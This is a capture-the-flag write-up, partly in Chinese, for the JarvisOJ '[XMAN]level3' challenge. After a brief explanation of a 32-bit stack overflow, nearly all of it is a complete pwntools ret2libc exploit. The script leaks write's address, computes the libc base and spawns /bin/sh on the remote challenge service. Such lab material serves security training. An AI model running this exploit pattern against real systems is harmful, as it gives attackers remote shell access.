[XMAN]level3
nc pwn2.jarvisoj.com 9879
Hint1: 本题附件已更新,请大家重新下载以免影响解题。
level3.rar.f795bbaa1e4a3f9d467317d6df936c6b
32 位程序栈溢出,利用方式为 ret2libc:先泄露 write 的运行时地址以计算 libc 基址,再调用 system("/bin/sh")。
exp如下:
from pwn import *

# Two-stage ret2libc run against the 32-bit stack overflow in ./level3.
# Stage 1 makes the service send back four bytes that the script treats as
# the runtime address of write(); stage 2 reuses the same overflow with
# addresses computed from that value.
#
# NOTE(review): every hard-coded address below is tied to one specific build
# of the challenge binary, and the libc offsets come from the local
# ./libc-2.19.so copy. Both are assumptions to confirm against the
# downloaded attachment.

# The listing targets the remote challenge service. Two local alternatives
# were left commented out by the author: process('./level3') and
# gdb.debug('./level3').
conn = remote('pwn2.jarvisoj.com', 9879)

# `elf` is loaded but not referenced again; the author had `libc = elf.libc`
# commented out in favour of the libc file named below.
elf = ELF('./level3')
libc = ELF('./libc-2.19.so')

# 140 filler bytes precede the first address in both payloads.
PAD = b'a' * 140
# NOTE(review): presumably the PLT stub for write - confirm against the binary.
FIRST_HOP = 0x8048340
# NOTE(review): used as the return slot in both stages; presumably the
# function that prints "Input:" and reads again - confirm.
REENTRY = 0x804844B
# NOTE(review): presumably the GOT entry for write - confirm.
LEAK_SLOT = 0x804A018

conn.recvuntil('Input:\n')

# Stage 1: the three trailing words look like call arguments
# (1, LEAK_SLOT, 4), i.e. four bytes read from LEAK_SLOT - TODO confirm.
leak_chain = PAD + p32(FIRST_HOP) + p32(REENTRY) + p32(1) + p32(LEAK_SLOT) + p32(4)
conn.send(leak_chain)

# The four bytes that come back are unpacked as a little-endian 32-bit value
# and treated as the address of write in the running process.
write_addr = u32(conn.recv(4))
info(f"write_addr:{hex(write_addr)}")

# Subtracting write's offset inside the libc file gives the load base.
libc_base = write_addr - libc.symbols['write']
info(f"libc_base:{hex(libc_base)}")

# The script expects the prompt a second time before sending stage 2.
conn.recvuntil('Input:\n')

system_addr = libc_base + libc.symbols['system']
info(f"system_addr:{hex(system_addr)}")

# First occurrence of the "/bin/sh" byte string inside the libc file.
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
info(f"binsh_addr:{hex(binsh_addr)}")

# Stage 2: same padding, then system's address, a return slot, and the
# address of the "/bin/sh" string as the single argument.
final_chain = PAD + p32(system_addr) + p32(REENTRY) + p32(binsh_addr)
conn.send(final_chain)

# Hand the connection over to the terminal.
conn.interactive()